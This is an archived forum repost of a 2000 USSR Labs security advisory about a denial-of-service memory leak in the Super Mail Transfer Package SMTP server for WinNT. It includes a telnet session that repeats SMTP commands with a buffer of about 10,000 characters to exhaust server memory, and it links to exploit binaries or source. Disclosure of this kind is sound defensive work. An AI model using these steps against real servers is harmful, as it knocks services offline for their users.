Local/RemoteD.o.SAttackinSuperM

精华区

当前位置：网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◇技术资料◇>>其他资料>>Local / Remote D.o.S Attack in Super M

主题：Local / Remote D.o.S Attack in Super M

发信人: williamlong()
整理人: williamlong(2002-12-01 16:43:37), 站内信件

Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)
Server for WinNT Version 1.9x

USSR Advisory Code:   USSR-2000031

Release Date:
January 13, 2000

Systems Affected:
Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for
WinNT Version  1.9x and maybe
other versions.

THE PROBLEM
A memory leak exists in the Super Mail Transfer Package  that may
cause an NT host to stop functioning and/or need to be rebooted.
The memory leak may occur when you connect to the SMTP port,
all information you send to the system will be stored in  memory,
and SMTP support multiples HELO/ MAIL FROM/ RCPT TO / DATA in the
same connection.
If you did multiple HELO/ MAIL FROM/ RCPT TO / DATA in the same
connection the  memory may not be deallocated. This condition may
cause the computer to stop  functioning the moment memory runs out.

Example:
[[email protected]$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK

If you repeat this commands all information passed to the server will

be stored in memory thus the memory leak problem,

Where [buffer] is aprox. 10000 characters.

Binary or source for this D.o.s:

http://www.ussrback.com/

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
contribution to w00giving for all you w00nderful people out there.
You do know what w00giving is don't you?
http://www.w00w00.org/advisories.html

Vendor Status:
Contacted.

Vendor   Url: http://www.web-net.com/supermail/
Program Url: http://shareit1.element5.com/programs.html?nr=100364

Credit: USSRLABS

SOLUTION
Vendor say:
The related problems are fixed in the next generation of SMTP call
MsgCore/NT.

Greetings:
EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN,
Technotronic and Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c
h
http://www.ussrback.com

--

    ☆ 蓝色月光 ☆  http://williamlong.163.net


※ 来源:．月光软件站 http://www.moon-soft.com．[FROM: 61.128.129.3]

[关闭][返回]